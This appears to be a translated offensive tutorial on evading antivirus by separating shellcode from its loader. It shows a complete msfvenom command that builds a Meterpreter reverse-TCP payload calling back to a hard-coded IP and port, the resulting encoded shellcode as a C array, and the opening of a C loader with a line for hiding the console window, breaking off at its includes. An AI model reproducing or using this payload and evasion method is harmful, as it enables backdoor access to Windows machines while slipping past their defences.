Payload separation to evade antivirus
Antivirus engines detect by static signature, by behavior, and by cloud lookup; the cloud lookup is mostly signature matching (file hashes and byte patterns) against the file as it sits on disk, and every engine scans the static contents of the executable itself. If the payload is split out of the program, so that the raw shellcode never appears in the binary that gets scanned, the static check of current mainstream AV can be bypassed. Note that this only defeats static signature matching: what the loader does at runtime (allocating executable memory, copying code into it and jumping there) is still visible to behavioral and memory scanning.
1. Backdoor compiled from C
root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfvenom -a x86 --platform Windows \
> -p windows/meterpreter/reverse_tcp \
> -b '\x00\x0b' LHOST=123.56.138.161 LPORT=1234 -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of c file: 1571 bytes
unsigned char buf[] =
"\xda\xda\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x56\xba\xa9\x70\x10"
"\xb6\x83\xc7\x04\x31\x57\x14\x03\x57\xbd\x92\xe5\x4a\x55\xd0"
"\x06\xb3\xa5\xb5\x8f\x56\x94\xf5\xf4\x13\x86\xc5\x7f\x71\x2a"
"\xad\xd2\x62\xb9\xc3\xfa\x85\x0a\x69\xdd\xa8\x8b\xc2\x1d\xaa"
"\x0f\x19\x72\x0c\x2e\xd2\x87\x4d\x77\x0f\x65\x1f\x20\x5b\xd8"
"\xb0\x45\x11\xe1\x3b\x15\xb7\x61\xdf\xed\xb6\x40\x4e\x66\xe1"
"\x42\x70\xab\x99\xca\x6a\xa8\xa4\x85\x01\x1a\x52\x14\xc0\x53"
"\x9b\xbb\x2d\x5c\x6e\xc5\x6a\x5a\x91\xb0\x82\x99\x2c\xc3\x50"
"\xe0\xea\x46\x43\x42\x78\xf0\xaf\x73\xad\x67\x3b\x7f\x1a\xe3"
"\x63\x63\x9d\x20\x18\x9f\x16\xc7\xcf\x16\x6c\xec\xcb\x73\x36"
"\x8d\x4a\xd9\x99\xb2\x8d\x82\x46\x17\xc5\x2e\x92\x2a\x84\x26"
"\x57\x07\x37\xb6\xff\x10\x44\x84\xa0\x8a\xc2\xa4\x29\x15\x14"
"\xbd\x3e\xa6\xca\x05\x2e\x58\xeb\x75\x66\x9f\xbf\x25\x10\x36"
"\xc0\xae\xe0\xb7\x15\x5a\xeb\x2f\xed\xa2\x61\x0e\x79\xd0\x75"
"\x55\xa8\x5d\x93\x05\x1c\x0d\x0c\xe6\xcc\xed\xfc\x8e\x06\xe2"
"\x23\xae\x28\x29\x4c\x45\xc7\x87\x24\xf2\x7e\x82\xbf\x63\x7e"
"\x19\xba\xa4\xf4\xab\x3a\x6a\xfd\xde\x28\x9b\x9a\x20\xb1\x5c"
"\x0f\x20\xdb\x58\x99\x77\x73\x63\xfc\xbf\xdc\x9c\x2b\xbc\x1b"
"\x62\xaa\xf4\x50\x55\x38\xb8\x0e\x9a\xac\x38\xcf\xcc\xa6\x38"
"\xa7\xa8\x92\x6b\xd2\xb6\x0e\x18\x4f\x23\xb1\x48\x23\xe4\xd9"
"\x76\x1a\xc2\x45\x89\x49\x50\x81\x75\x0f\x7f\x2a\x1d\xef\x3f"
"\xca\xdd\x85\xbf\x9a\xb5\x52\xef\x15\x75\x9a\x3a\x7e\x1d\x11"
"\xab\xcc\xbc\x26\xe6\x91\x60\x26\x05\x0a\x93\x5d\x66\xad\x54"
"\xa2\x6e\xca\x55\xa2\x8e\xec\x6a\x74\xb7\x9a\xad\x44\x8c\x95"
"\x98\xe9\xa5\x3f\xe2\xbe\xb6\x15";
Copy the shellcode above and, using inline assembly, build it into an .exe executable.
#include <stdio.h>
#include <windows.h>
//#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") // uncomment to hide the console window (GUI subsystem, CRT entry point kept)
#pragma comment(linker,"/INCREMENTAL:NO") // disable incremental linking so the output has no ILT thunks or padding